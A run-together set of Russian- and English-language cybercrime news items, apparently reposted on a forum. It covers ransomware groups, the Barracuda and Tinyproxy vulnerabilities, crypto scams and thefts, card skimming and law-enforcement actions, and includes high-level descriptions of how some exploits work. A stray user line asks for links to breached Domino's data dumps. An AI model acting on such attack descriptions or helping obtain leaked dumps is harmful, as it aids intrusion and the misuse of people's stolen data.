После первичного проникновения в сеть потенциальной жертвы, злоумышленники сперва пытаются выяснить, есть ли в атакованной инфраструктуре особо важные данные, за которые жертва готова будет раскошелиться. Исследователи отметили, что члены Mespinoza осуществляют поиск по ключевым словам, таким как clandestine («скрытый»), fraud («мошенничество» или «мошеннический»), SSN (номер полиса социального страхования, основной идентификатор граждан США), driver'slicense («водительские права») и I-9 (это форма подтверждения права на трудоустройство в США).
В ходе одной из расследованных Unit 42 атак, операторы Mespinoza, получив доступ к компьютерной системе внутри целевой инфраструктуры через RDP, и запустили серию batch-скриптов, использующих утилиту командной строки PsExec, с помощью которых по множеству других компьютерных систем был распространен исполняемый файл шифровальщика.
...в посудной лавке
По данным Cynet, Mespinoza связана с некоей французской APT-группировкой, которая начала активное использование шифровальщика где-то в октябре 2019 г. Таким образом, злоумышленники оставались «ниже радара» на протяжении почти двух лет.
Любопытно, что последняя публикация утечки PYSA датирована концом апреля 2021 г. С тех пор атак либо не было, либо, наоборот, они заканчивались полной выплатой требуемой суммы.
В любом случае, за последние месяцы свернули деятельность (самостоятельно или вынужденно) сразу несколько шифровальных группировок, в том числе, REvil, Avaddon и DarkSide; некоторые другие не проявляли активности уже на протяжении нескольких месяцев. Впрочем, остаются группировки вроде Conti, которые продолжают вести активную вредоносную деятельность и по сей день.
«Довольно странно, что активную шифровальную группировку игнорировали до недавнего времени. Это шпионские APT-группы могут долго оставаться незамеченными, а шифровальщики-вымогатели проявляются сразу же и весьма явственно, — говорит Михаил Зайцев, эксперт по информационной безопасности компании SEC Consult Services. — Возможно, их жертвы до определенного момента предпочитали “решать вопрос по-тихому” с минимальным опубличиванием инцидента. Но потом кто-то из пострадавших сообщил-таки в ФБР».
• Source: <https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools- install-mespinoza-ransomware/>
Правоохранительные органы США и Германии арестовали домен криптовалютного онлайн-кошелька Cryptonator и предъявили обвинение его основателю и оператору, россиянину Роману Боссу (Пикулеву) в отмывании средств.
Roman Pikulev
По версии следствия, с 2014 по 2023 год платформа обработала нелегальные транзакции на сумму $235 млн.
Сюда входят:
высокорисковые операции — $80 млн;
санкционные адреса — $71 млн;
кошельки, связанные с кражей криптовалют —$54 млн;
мошеннические адреса — $34,5 млн;
криптомиксеры —$34 млн,
даркнет-маркетплейсы — $25 млн;
операторы программ-вымогателей — $8 млн.
Специалисты аналитической компании TRM Labs [установили связь](https://www.trmlabs.com/post/us-and-german-authorities-seize-crypto- wallet-cryptonator-and-charge-administrator) части транзакции с даркнет- маркетплейсом Hydra, миксером Blender.io, пирамидой «Финико», обменником Bitzlato, российской биржей Garantex, иранской Nobitex и неизвестной террористической организацией.
В общей сложности платформа провела более 4 млн транзакций на общую сумму $1,4 млрд, причем Босс получал небольшую долю с каждой операции.
Cryptonator не требовал от пользователей прохождения верификации, торговал анонимными монетами и, согласно обвинению, предлагал интеграцию API-ключей с нелегальными платформами.
Помимо отмывания средств Боссу вменяют осуществление нелицензированной деятельности по предоставлению денежных услуг. Власти требуют арестовать его активы, назначить ему выплату штрафов, ввести запретительные меры и обязать возместить ущерб.
• Source: https://www.documentcloud.org/documents/25029944-boss-indictment
• Source: <https://www.documentcloud.org/documents/25029923-cryptonator- complaint>
В банке «Тинькофф» после года тестирования заработала система дроп- мониторинга. Как сообщает портал Банки.ру, она позволяет выявлять потенциальных дропов еще до того, как средства попадут к ним на счет.
«Все чаще мошенники вербуют молодых людей в дропы — это легкий и быстрый заработок, и молодежь не всегда понимает последствия таких действий, как продажа карт, которые после используются для совершения преступлений», — объяснил руководитель Центра экосистемной защиты «Тинькофф» Олег Замиралов.
Click to expand...
Отмечается, что компании удалось составить некий «портрет дропа», позволяющий выявлять признаки, указывающие на высокую вероятность передачи оформленной карты мошенникам. Один из них — перерегистрация пластика на другой номер с последующим проведением по нему нескольких небольших операций.
Таким образом, «Тинькофф» стал третьим банком из российского топ-5, посвятившим проблеме дропов отдельное технологическое решение. Аналогичная система дро-мониторинга уже активно применяется банком ВТБ. В 2023 году с ее помощью на счетах дропов задержали около миллиарда рублей, из которых 170 миллионов были возвращены законным владельцам.
В «Сбербанке» дропами занимаются уже два года. В компании отмечают, что за это время среди клиентов их стало меньше в 10-12 раз.
sc: banki.ru/news/lenta/?id=11002200
Хакерская атака на компьютерную систему компании «Киевстар», крупнейшего на Украине оператора мобильной связи, привела к «катастрофическим» разрушениям и уничтожила «почти всё», заявил в интервью Reuters глава департамента кибербезопасности Службы безопасности Украины (СБУ) Илья Витюк. По его словам, хакерам удалось уничтожить тысячи виртуальных серверов, а сама атака стала, возможно, первым примером полного разрушения ядра телекоммуникационной системы.
При этом на украинской армии, по утверждению СБУ, атака сказалась мало, так как военные используют другие системы связи, «другие алгоритмы и протоколы», она также не помешала ПВО. По словам Витюка, целью атаки было нанесение «психологического удара». Кроме того, атака стала «предупреждением» о том, что на неприкосновенность не может рассчитывать никто.
Витюк отметил, что расследование обстоятельств хакерской атаки продолжается, в частности, изучаются образцы использованного при атаке вредоносного программного обеспечения, но он сам «практически уверен», что удар наносили специалисты группировки Sandworm, которую в СБУ считают киберподразделением российской военной разведки. При этом в систему «Киевстара» хакеры проникли задолго до того, как она была ими обрушена.
«Пока мы можем с уверенностью сказать, что они были в системе по крайней мере с мая 2023 года. Я не могу сейчас сказать, с какого времени они получили... полный доступ: вероятно, по крайней мере с ноября», — сказал Витюк.
По его словам, проникшие в систему «Киевстара» хакеры могли красть личные данные абонентов, определять их местонахождение, перехватывать СМС-сообщения и, возможно, взламывать аккаунты в Telegram. Однако представитель «Киевстара» заверил Reuters, что компания не выявила утечек информации абонентов.
Сбой в работе крупнейшего оператора мобильной связи Украины произошел утром 12 декабря 2023 года. Абоненты «Киевстара» пожаловались на отсутствие связи и интернета, с неполадками столкнулись также клиенты двух крупнейших банков страны — Приватбанка и Ощадбанка. Кроме того, в некоторых регионах перестала работать система оповещения о воздушной тревоге. Комаров объяснил сбой кибератакой.
Служба безопасности Украины возбудила уголовное дело по восьми статьям УК. В ведомстве заявили, что, по одной из версий, за хакерской атакой могут стоять российские спецслужбы.
По словам Витюка, за первой крупной атакой последовал ряд новых ударов, которые должны были причинить «Киевстару» еще больший ущерб и надолго оставить украинцев без связи. «В таком случае длительной перегрузки своих сетей могли бы не выдержать и другие операторы», — пояснил глава киберразведки СБУ, отметив, что специалисты его службы помогли «Киевстару» отразить новые удары и возобновить работу.
Barracuda, специализирующаяся на безопасности сетей и электронной почты, сообщает, что недавно исправленная [0-day](https://www.securityweek.com/zero- day-vulnerability-exploited-to-hack-barracuda-email-security-gateway- appliances/) использовалась в течение семи месяцев для доставки вредоносного ПО на устройства Email Security Gateway (ESG) клиентов и кражи данных.
Инициированное расследование совместно с привлеченными для этого специалистами Mandiant привело к CVE-2023-2868, которая была впервые проэксплуатирована в октябре 2022 года для получения доступа к устройствам ESG и развертывания бэкдоров, обеспечивающих злоумышленникам постоянный доступ к скомпрометированным системам.
Уязвимость влияет только на устройства Email Security Gateway с версиями 5.1.3.001–9.2.0.006 и связана с проблемой внедрения удаленных команд, обусловленной неполной проверкой входных данных для предоставленных пользователем файлов .tar.
Удаленный злоумышленник может отформатировать имена файлов определенным образом, что приведет к удаленному выполнению системной команды через оператор Perl qx с привилегиями продукта Email Security Gateway.
Barracuda узнала об атаках 18 мая и на следующий день подтвердила наличие новой уязвимости.
Патч на устройства ESG был выпущен 20 мая, а через день поставщик выпустил дополнительный скрипт для локализации потенциального несанкционированного доступа.
Кроме того, Barracuda предоставила дополнительную информацию об атаке и действиях, предпринятых злоумышленниками.
На скомпрометированных устройствах были обнаружены три типа вредоносных ПО. Один из них, SaltWater, был описан как троянизированный модуль для демона SMTP Barracuda, который позволяет загружать или скачивать файлы, выполнять команды и использовать его в качестве прокси.
Другая вредоносная ПО SeaSpy - это бэкдор, выдающий себя за один из сервисов Barracuda.
Он отслеживает трафик и обеспечивает функциональность бэкдора. Mandiant обнаружил некоторое совпадение кода с общедоступным бэкдором cd00r.
Третье вредоносное ПО называется Seaside и описывается как модуль на основе Lua, который также нацелен на демона SMTP Barracuda. Он получает IP-адрес и порт управления и контроля (C2), которые передаются внешнему двоичному файлу, который устанавливает обратную оболочку.
Barracuda представила индикаторы компрометации (IoC) как для конечных точек, так и для сетей, а также правила Yara, которые можно использовать для поиска угроз.
Клиентам рекомендовано убедиться, что их устройства обновлены, и прекратить использование скомпрометированных устройств.
Barracuda обещает предоставить новые виртуальные или аппаратные устройства всем пострадавшим пользователям.
По данным сервиса Whale Alert, отслеживающего крупные транзакции в блокчейнах, владелец криптовалютного кошелька переслал 26 BTC мошенникам, создавшим поддельный канал Майкла Сэйлора на YouTube.
Схема у мошенников была достаточно стандартная – создав поддельный аккаунт генерального директора компании MicroStrategy Майкла Сэйлора (Michael Saylor), они запустили «новогоднюю раздачу», в рамках которой обещали удвоить любую поступившую на указанный адрес сумму в криптовалютах.
Однако, нашелся один доверчивый и богатый пользователь. В попытке получить «халявные» биткоины он перечислил на кошелек мошенников 26 BTC, что по текущему курсу составляет более $1.1 млн. По данным Whale Alert, это крупнейший «куш», сорванный мошенниками за единичную транзакцию.
Злоумышленники запустили якобы официальный канал Сэйлора на YouTube и специальный сайт с «правилами участия». Сейчас и канал, и сайт уже заблокированы. Сам Майкл Сэйлор в ответ на сообщение Whale Alert написал:
«За прошлую неделю на YouTube было запущено 489 таких мошеннических каналов. Мы жалуемся на них каждые 15 минут и их блокируют в течение нескольких часов, но мошенники просто запускают новые».
Based on a report from Flashpoint, **** members are now communicating in the forums using machine translated Mandarin and there is sudden spike of 30 new members from China in the forum community.
Researchers predict that Russian ransomware operators are establishing a collaboration with Chinese hackers to prepare some attacks against U.S entities, exchange exploits, malware or to hire talents. A user that goes by the name Kajit is the one who seems to have initiated this activity and the user also seems to be the admin of the **** forum. It is be noted that this unusual Russian Chinese hackers combo was also seen in XSS hacking forum.
Click to expand...
Source: [https://www.thecybersecuritytimes.c...rs-and-ransomware-operators- working-together/](https://www.thecybersecuritytimes.com/russian-chinese- hackers-and-ransomware-operators-working-together/)
Туристов, собравшихся на Бали с банковскими картами, а не с наличными деньгами, предупреждают — популярный курорт захлестнуло новое мошенничество против туристов и их кошельков. Мошенники настолько обнаглели, что преднамеренно заклеивают фейковыми табличками исправные банкоматы, пытаясь перенаправить туристов к другим, более уязвимым для скимминга карт — т.е. установки специальных устройств, позволяющих «считать» пин-код и другие данные карты туриста.
Индонезийские СМИ ссылаются на показания туристов в соцсетях, которые заставали мошенников за работой. «Предупреждаю, вот этот парень в фиолетовой рубашке продолжает ставить знак «сломан» на вполне рабочий банкомат Commonwealth Bank в супермаркете Bintang», - пишет в соцсетях один из туристов. На фотографии запечатлён вполне работающий, то есть, не отображающий никаких предупреждений на экране банкомат Commonwealth Bank, расположенный в супермаркете Seminyak, где кто-то поместил написанную от руки — причем по- английски табличку «сломано» над слотом для карт.
Как пояснили эксперты, это обычная опасность на Бали — да и в других странах Азии. Мошенники терпеливо ждут, пока ничего не подозревающие люди воспользуются ближайшим банкоматом, который, вероятно, оснащен скиммером — устройством, предназначенным для тайного сбора информации о держателях карт. для незаконных целей. Скиммеры для карт обычно устанавливаются на законных считывателях карт, включая банкоматы и платежные терминалы, что позволяет мошенникам красть данные платежных карт. При этом именно банкоматы Commonwealth Bank на Бали, считаются относительно безопасными вследствие постоянного контроля персонала, который сводит к минимуму риск скимминга — именно поэтому обнаглевшие мошенники помечают их как «сломанные» или «вышедшие из строя», тем самым направляя людей к более уязвимым вариантам.
Исследователи в области кибербезопасности из IBM X-Force [раскрыли подробности](https://securityintelligence.com/posts/analysis-of-diavol- ransomware-link-trickbot-gang/) о ранней версии вымогательского ПО под названием Diavol. Находки специалистов проливают свет на связь между Diavol и операторами ботнета TrickBot.
По словам исследователей из IBM X-Force, образец вымогателя имеет сходство с другими вредоносными программами операторов TrickBot, что позволяет установить более четкую связь между ними.
В начале июля нынешнего года Fortinet раскрыла особенности неудачной атаки вымогателя с использованием полезной нагрузки Diavol, нацеленной на одного из своих клиентов, подчеркнув, что исходный код полезной нагрузки перекрывается с кодом Conti и методами Egregor.
«Как часть процедуры шифрования, Diavol использует асинхронные вызовы процедур (APC) в пользовательском режиме без симметричного алгоритма шифрования. Обычно авторы программ-вымогателей стремятся завершить операцию шифрования в кратчайшие сроки. Асимметричные алгоритмы шифрования — не очевидный выбор, поскольку они работают значительно медленнее, чем симметричные алгоритмы», — [сообщили эксперты](https://www.fortinet.com/blog/threat-research/diavol-new- ransomware-used-by-wizard-spider).
Как показали результаты анализа новой версии Diavol, вредонос способен завершать произвольные процессы и назначать приоритеты типам файлов для шифрования на основе предварительно настроенного списка расширений, составленного злоумышленником. Выполнение программы-вымогателя начинается со сбора системной информации, которая используется для генерации уникального идентификатора, почти идентичного идентификатору ботнета TrickBot, за исключением добавления поля имени пользователя Windows.
Сходство между Diavol и TrickBot также заключается в том, что HTTP-заголовки, используемые для C&C-сервера, настроены отдавать предпочтение русскоязычному контенту.
Как отметили эксперты, в Diavol используется код для проверки языка на зараженной системе с целью фильтрации жертв в России или в регионе Содружества Независимых Государств (СНГ). Как известно, данная тактика была присуща группировке TrickBot.
IM client tool Pidgin on Windows and Linux.
Zero-day exploit broker Zerodium announced it is looking for 0day exploits affecting the IM client tool Pidgin on Windows and Linux. The company will pay up to $100,000 for zero-days in Pidgin, which is a free and open-source multi-platform instant messaging client.
Why Zerodium is interested into this specific IM tool?
Because Pidgin is used by cybercriminal organizations and terrorist groups, some of them developed specific plugins to add additional protection to the communications. Today the Pidgin client is mainly used to exchange messages via the XMPP (Jabber) protocol. Pidgin also supports plugins that implement Off-the-Record Messaging over any IM network Pidgin supports.
Researchers from Trend Micro [reported](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and- digital-threats/overlapping-technologies-cybercriminals-and-terrorist- organizations?_ga=2.25677695.370948683.1622622441-1321699941.1622622441) the existence of Asrar al-Dardashah, a plugin released in 2013 that was developed for Pidgin to add encryption to the instant messaging functions, securing instant messaging with the press of a single button.
Zerodium resells the exploits to its customers that include law enforcement bodies and intelligence agencies that could use them in their investigations.
_“We are looking for remote code execution exploits affecting the latest version of Pidgin on Windows and/or Linux. The exploit should work with default installations and should not require any user interaction other than reading a message.” reads the announcement published by Zerodium that is valid until 31 August 2021.
“Cybercriminals shifted from ICQ towards Jabber (XMPP) in the early 2000s,” [Recorded Future threat intelligence analyst Dmitry Smilyanets told The Record](https://therecord.media/zerodium-acquiring-zero-days-in-pidgin-an-im- client-popular-with-cybercriminals/)._
The announcement is temporary likely because it comes after a request of some of its customers.
The company is searching for a remote code execution issue that could be exploited to take over the target device without any user interaction, for example just reading a message sent via the messaging app.
Other temporary acquisitions run by Zerodium include ISPConfig and WordPress RCE.
Прокси-утилита Tinyproxy содержит в себе опасную уязвимость, из-за которой множество серверов могут стать жертвой хакеров, у которых нет большого опыта взлома. Разработчик в курсе проблемы, но пока ничего не предпринимает – видите ли, ему прислали уведомление о «дыре» в его продукте на устаревший адрес почты. Почему он не потрудился актуализировать свою контактную информацию – он не уточняет.
Говоришь на меня – переводишь на себя
Прокси-инструмент Tinyproxy, распространяющийся на бесплатной основе и размещенный на GitHub, оказался полезен не только системным администраторам, но и хакерам. Как пишет портал Hacker News, в нем еще в конце 2023 г. нашли огромную «дыру», которую разработчики совершенно не торопятся латать, хотя прекрасно знают о ее существовании.
Проблему выявили ИБ-эксперты группы Cisco Tallos – уязвимость получила индекс CVE-2023-49606 и едва ли не максимальный уровень опасности, 9,8 балла из 10 возможных.
Специалисты Tallos связались с программистом под псевдонимом rofl0r , являющимся одним из ключевых разработчиков «дырявой» прокси-утилиты. Электронное письмо было направлено ему еще в последних числах декабря 2023 г., однако патча для Tinyproxy на момент выхода материала не существовало.
Rofl0r заявил, что сотрудники Tallos отправили свое письмо на неактуальный адрес электронной почты, но почему он не указал на сайте проекта действующие контакты, программист не объяснил. Теперь он заявляет, что из-за этого недоразумения разработчики Tinyproxy узнали о проблеме лишь 5 мая 2024 г. – на нее указал программист, курирующий разработку Tinyproxy под Debian Linux.
Также rofl0r поспешил переложить вину с себя на специалистов Tallos. По его словам, нужно было не писать на электронную почту, а отправить уведомление через GitHub или, как альтернатива, оставить ему сообщение в IRC. Rofl0r утверждает, что если бы ИБ-специалисты поступили именно так, то проблема была бы решена в течение суток.
Отметим, что IRC – это древний мессенджер, пик популярности которого пришелся на начало XXI века. В 2024 г. подавляющее большинство современных пользователей даже не знает о его существовании – он не входит даже в 10-ку самых популярных сервисов для общения.
Последствия плохой коммуникации
В своем письме сотрудники Tallos направили rofl0r не только уведомление о найденной проблеме, но даже готовый эксплойт, наглядно демонстрирующий, что может сделать с системой брешь в Tinyproxy. Если такой эксплойт есть у них, киберпреступники, вероятно, тоже смогли собрать его.
По сути, для эксплуатации «дыры» в Tinyproxy не нужны глубокие познания в ИТ. Достаточно будет отправить особым образом сформированный HTTP-заголовок, вследствие чего произойдет повторное использование ранее освобожденной памяти, что вызовет ее повреждение и даст хакерам возможность запустить любой нужный им код на сервере жертвы.
По данным Hacker News, на начало мая 2024 г. в мире насчитывалось свыше 90,3 тыс. серверов, на которых была установлена утилита Tinyproxy. Более половины из них совершенно точно уязвимы, так как уязвимость CVE-2023-49606 была обнаружена в версиях Tinyproxy 1.10.0 и 1.11.1, установленных на них. Не исключено, что она есть и в других сборках – тогда уязвимых серверов будет больше.
Если точнее, то неиллюзорная угроза взлома из-за Tinyproxy нависла над владельцами как минимум 52 тыс. серверов. Это примерно 57% от общего числа серверов, на которых работает данная утилита.
Меньше всех повезло системным администраторам из США. В этой стране сконцентрировано наибольшее количество «дырявых» серверов – их там около 32,85 тыс. Второе место заняла Южная Корея – в этой стране насчитывается почти 18,36 тыс. серверов с проблемной сборкой Tinyproxy.
Тройку лидеров закрывает Китай – 7,8 тыс. серверов. За ним идут Франция (5,2 тыс.) и Германия (около 3,7 тыс.). Из этого следует, что проблема с Tinyproxy получила глобальное распространение – детище rofl0r и его коллег открыло хакерам легкий доступ к серверам как минимум в Европе, Азии и Северной Америке.
Кевин МакШихан из США нашёл уязвимость в аккаунте ЦРУ в соцсети X. Он зарегал ник в Telegram, которое ЦРУ использовало для связи с инагентами. Он перенаправил пользователей на свой канал и предупредил их о проблеме.
27 сентября ЦРУ опубликовало ссылку на Telegram-канал для анонимной связи. Из- за ошибки ссылка была сокращена до t.me/securelycont, которое не было занято.
МакШихан зарегистрировал это имя и создал свой канал. Он написал, что это не канал ЦРУ и попросил не передавать секретную информацию.
source: bbc.co.uk/news/technology-67137773
ИБ-исследователи из DomainTools
[обнаружили](https://www.domaintools.com/resources/blog/purpose-built-
criminal-proxy-services-and-the-malicious-activity-they-enable/) новый рынок
резидентных прокси, где, согласно рекламе, продают доступ к миллиону прокси-
адресов по всему миру. Эксперты предупреждают, что BlackProxies быстро
набирает популярность среди хакеров, фишеров, перекупщиков и мошенников, хотя
якобы запрещает вредоносные и незаконные действия.
[](https://xakep.ru/wp-
content/uploads/2022/12/408860/prohibited.jpg)Список якобы запрещенных
действий
По словам специалистов, появление крупной платформы такого рода – это заметное
событие, учитывая, что за последние пару лет правоохранительные органы закрыли
несколько подобных сервисов, включая RESNET и INSORG.
В отчете отмечается, что резидентные прокси, как правило, используют IP-адреса
обычных пользователей, а не адресное пространство дата-центров, что делает их
идеальными для запуска торговых ботов, а также для злоумышленников, которые
хотят «спрятаться» в обычным трафике. Иногда пользователи становятся прокси-
серверами добровольно (за отдельную плату), но чаще это происходит из-за
заражения их компьютеров, IoT-устройств и роутеров малварью.
Киберпреступники, как правило, используют резидентные прокси для повышения
эффективности своих атак, скрываясь от правоохранительных органов и
блокировщиков.
Операторы BlackProxies утверждают, что имеют доступ к пулу из 1 000 000 IP-
адресов со всего мира, все они исходят от реальных пользователей, что
обеспечивает требуемую разблокировку, низкий уровень обнаружения и хорошую
скорость. Кроме того, сервис предлагает систему автоматической ротации,
которая автоматически обновляет IP-адреса, гарантируя, что каждый запрос
выполняется с нового адреса.
[](https://xakep.ru/wp-
content/uploads/2022/12/408860/black-proxies.jpg)
Также клиентам сервиса предоставляется панель управления со статистикой
использования в реальном времени и REST API для обеспечения гибкости и,
вероятно, возможности перепродажи.
Стоимость услуг BlackProxies оценивается в 14 долларов в день, 39 долларов в
неделю или 89 долларов в месяц (пробный пакет стоит 4,9 доллара).
Аналитики DomainTools изучили платформу и обнаружили, что утверждения об
огромном пуле IP-адресов являются ложью. На самом деле сервис располагает
примерно 180 000 доступными IP-адресами. Исследователи отмечают, что это все
равно немало и значительно превосходит возможности многих других платформ и
ботнетов.
Также в отчете отметается, что один из инфраструктурных IP-адресов сервиса
ранее был связан с другими теневыми платформами.
Издание Bleeping Computer сообщает, что в настоящее время BlackProxies активно
продвигается на хакерских форумах, в темах, посвященных атакам credential
stuffing и захвату учетных записей.
По данным The Wall Street Journal (WSJ), несмотря на широкое использование Telegram преступниками, мессенджер стал важным инструментом правоохранительных ведомств для проникновения в преступные группировки даже без сотрудничества с руководством платформы. За последние пять лет спецслужбы США смогли привлечь к ответственности многих преступников, используя их собственные сообщения в открытых телеграм-каналах, что сделало мессенджер «охотничьими угодьями» правоохранительных ведомств, пишет издание.
WSJ отмечает, что до появления Telegram преступники в основном использовали разрозненные форумы в даркнете, недоступные обычным пользователям. Закрыть такие форумы можно было только по судебному решению, а отследить пользователей было сложно. В Telegram преступники часто используют один и тот же аккаунт на различных платформах, что позволяет следователям составить их «дорожную карту», пояснил экс-федеральный прокурор Сет Герц.
Однако Эван Кольманн, консультант по борьбе с терроризмом, работавший в ФБР, считает, что Telegram все же более удобен для преступников, чем для следователей. По его мнению, находки правоохранительных органов в Telegram — это лишь «капля в море».
WSJ приводит несколько примеров успешного использования Telegram в расследованиях:
В 2020 году федеральные агенты смогли перекрыть финансирование «Аль-Каиды"
(признана террористической и запрещена в России), обнаружив открытое
обсуждение схемы поступления денег в публичном телеграм-канале. Группировка
просила подписчиков присылать деньги на биткоин-адрес для покупки оружия
сирийским боевикам, что позволило властям США конфисковать средства.
В сентябре 2024-го двум американцам предъявили обвинения в управлении группой
в Telegram с неонацистким уклоном, которая подстрекала подписчиков к убийствам
на основании сексуальной ориентации или работы на госструктуры. Публичность
каналов помогла следствию собрать доказательства и выдвинуть обвинения.
Главный операционный директор Telegram Майк Равдоникас заявил WSJ: «Вряд ли
найдется хоть одно приложение социальной сети, которое не использовалось бы
преступниками, Telegram стремится максимально ограничить злоупотребления своей
платформой».
В прошлом месяце основатель платформы Павел Дуров был арестован властями Франции. В ответ на это Telegram обновил политику конфиденциальности и пообещал передавать властям IP-адреса и телефоны подозреваемых в совершении преступлений.
wsj.com/tech/how-telegram-became-a-hunting-ground-for-criminalsand- cops-8195f483
Пользователь криптовалютной биржи OKX лишился криптоактивов на сумму более $2 млн из-за утечки личных данных. Хакеры изменили в его аккаунте настройки безопасности, выдав себя за жертву при помощи дипфейка.
Пострадавший по имени Лай Фан Чан (Lai Fang Chang) поделился подробностями инцидента с криптожурналистом Колином У (Colin Wu). Хакеры взломали аккаунт Чана в Telegram, завладели личными данными и заполучили доступ к электронной почте через функцию восстановления пароля.
Затем хакеры воспользовались дипфейком с лицом Фан Чана, сгенерированным искусственным интеллектом. Дипфейк помог изменить настройки безопасности аккаунта на OKX, включая номер телефона клиента, адрес электронной почты и настройки идентификации Google. В течение суток киберпреступникам удалось украсть со счета пострадавшего пользователя более $2 млн. Какие именно криптоактивы похитили неизвестные — не уточняется.
Служба безопасности OKX подтвердила инцидент и пообещала помочь Фан Чану вернуть украденные активы при сотрудничестве с правоохранительными органами.
Инцидент, произошедший на OKX, говорит о распространении криптовалютного мошенничества с использованием дипфейков. Задействуя технологию, злоумышленники могут имитировать голос и лицо человека, чтобы успешно пройти процедуру «Знай своего клиента» (KYC), а также для распространения фейковых видео о раздачах криптовалют.
Аудитор блокчейнов OtterSec, плотно сотрудничающий с разработчиками Solana, выпустил официальное уведомления об атаке на DeFi-платформу Mango, работающую в этой сети. Хакерам удалось с помощью манипулирования ценой служебного токена, взять под залог MGNO завышенное кредитное обеспечение.
Проведя цикл таких операций, злоумышленники вывели всю ликвидность из пулов, обеспечивающих торговлю с плечом на платформе Mango.
Общая оценка ущерба в $100 млн уже официально подтверждена разработчиками смарт-контракта. Украденная криптовалюта пока находится на блокчейне Solana. Злоумышленники могли бы обменять такую сумму в ограниченном числе бирж, которые уже добавили адреса атаковавших Mango кошельков в «черный список».
Разработчики сейчас заняты перекрытием других путей обмена украденной криптовалюты. Однако тот факт, что хакеры могли манипулировать ценой MGNO, обрушил котировки служебного токена на 52%. Фактически, монета полностью обесценилась, общее падение от максимумов составило 99,6%.
Основатели Mango, как и аудитор OtterSec пока не смогли ответить на вопрос, как именно хакеры провели атаку. Поиск бага кода и техники манипуляции ценовыми оракулами, продолжается.
Any link to the dominos breached dumps??
Сотрудниками отдела экономической безопасности и противодействия коррупции УМВД России по городскому округу Красногорск задержаны участники группы, подозреваемые в незаконной банковской деятельности.
Установлено, что злоумышленники предоставляли юридическим и физическим лицам, заинтересованным в сокрытии от налогового учёта имеющихся у них денежных средств, услуги по обналичиванию.
Они переводили деньги клиентов подконтрольным организациям в счёт оплаты по фиктивным договорам оказания услуг, которые на самом деле не исполнялись. Комиссия за данные операции составляла 10% от обналичиваемой суммы.
В результате оперативно-розыскных мероприятий полицейские установили и задержали подозреваемых. Ими оказались двое мужчин и женщина в возрасте от 48 до 57 лет.
По предварительной оценке, злоумышленниками совершены незаконные финансовые операции на сумму около 150 миллионов рублей.
В ходе проведённых обысков по местам проживания задержанных обнаружены и изъяты: денежные средства, финансовые документы, печати различных организаций, электронные носители информации, компьютерная техника, а также документы, связанные с фиктивной регистрацией юридических лиц.
В отношении данных граждан следователем Следственного управления УМВД возбуждено уголовное дело по признакам преступления, предусмотренного ст. 172 Уголовного кодекса Российской Федерации «Незаконная банковская деятельность». Фигурантам избрана мера пресечения в виде подписки о невыезде и надлежащем поведении.
Расследование продолжается.
• Source: [https://mvdmedia.ru/news/operativny...presekli-nezakonnuyu- bankovskuyu-deyatelnost/](https://mvdmedia.ru/news/operativnye- novosti/v-krasnogorske-politseyskie-presekli-nezakonnuyu-bankovskuyu- deyatelnost/)
• Video:
Полицейские направили обвинительный акт в отношении трех фигурантов в суд —
фишерам грозит до 12 лет заключения с конфискацией имущества за воровство
денег при помощи фишинга.
Об этом сообщили в пресс-службе ГУ НП Украины в Одесской области.
Следователи выяснили, что группа в течение июля-ноября 2023 года с помощью фишинга похищала средства с БА граждан. Организатор схемы приобщил к ней ранее судимого знакомого и его несовершеннолетнюю сожительницу. Вместе они создали фишинговую страницу, внешне похожую на один из онлайн-сервисов популярной в Украине торговой интернет-площадки.
В дальнейшем, выдавая себя за покупателей, они подыскивали продавцов и убеждали их в намерении приобрести товар. Фигуранты предлагали перейти по ссылке на свой ресурс для оформления бесплатной доставки товаров. Желая продать товар, люди вводили свои личные данные и реквизиты банковских карт (номер, СѴѴ код, срок действия карты), а также предоставляли сведения для входа в интернет-банкинг.
Так фишеры получали всю необходимую им информацию для доступа к счетам потерпевших и выводили с них средства. Полицейские установили, что в результате от их действий пострадал 21 человек, а общая сумма нанесенного ущерба превышает миллион гривен.
Всех троих будут судить по ч. 4 и ч. 5 ст. 190, а старших членов группы еще и по ч. 1 ст. 304 Уголовного кодекса Украины. Фигурантам грозит до 12 лет лишения свободы с конфискацией имущества.
С 1 сентября 2023 года ФСБ получит круглосуточный удаленный доступ к информационным системам и базам данных служб заказов такси, включенных в реестр организаторов распространения информации.
Соответствующее постановление подписал премьер-министр России Михаил Мишустин.
Документ опубликован на портале правовой информации.
Кроме того, службы заказа такси, не попавшие в реестр, должны будут
предоставлять информацию по требованию ФСБ в течение 10 рабочих дней с момента
поступления запроса, а при наличии в запросе пометки «срочно» — в течение трех
дней.
Если служба такси не может предоставить информацию в указанный срок, то она должна сообщить ФСБ о сроках, необходимых для выполнения запроса, а также объяснить задержку.
В декабре 2022 года президент России Владимир Путин подписал закон о работе такси, по которому водители и службы заказа такси обязаны хранить данные о совершенных поездках в течение полугода и передавать эту информацию по требованию правоохранительных органов.
Click to expand...
Не знал про такое.
Оказывается водила обязан хранить инфу, с какого ночного клуба и с кем я
поехал и в какой отель.
В блокнотик записать и хранить - телка, 90-60-90, блондинка, 18-20 лет,
называлась Наташей, время отъезда 0.30, по пути заезжали в Дикси на Садово-
Каретной , покупали шампанское (см. доп инфу в записях камер видеонаблюденияи
и бд покупок), забрал назад в 10.30 и отвез с гостиницы по адресу ул. Ленина,
1.
Американская ИБ-компания FireEye обнародовала ежегодный отчет согласно которому, в настоящее время в мире действуют более 1900 различных хакерских групп. В 2019 году их насчитывалось около 1800.
За 2020 год эксперты обнаружили 650 новых хак-групп, а также удалили около 500 групп из своего трекера угроз из-за дублирования и совпадения с ранее известными кластерами.

Среди 1900 известных FireEye хакерских группировок есть как «правительственные» хакеры (APT), так и финансово мотивированные группы (FIN), а также неклассифицированные группы (UNC), информации о которых еще слишком мало, чтобы поместить их в любую из первых двух категорий.
Аналитики пишут, что суммарно в 2020 году злоумышленники использовали 514 новых образцов малвари. Согласно FireEye, за последний год хакеры создали более 500 новых семейств вредоносных программ, что соответствует уровню предыдущего года. Эта малварь делится на пять основных категорий: бэкдоры (36%), загрузчики (16%), дропперы (8%), лончеры (7%) и вымогатели (5%).
Примерно 19% от общего количества образцов малвари были публично доступны, а 81% либо были разработаны частными лицами, либо их доступность была жестко ограничена.
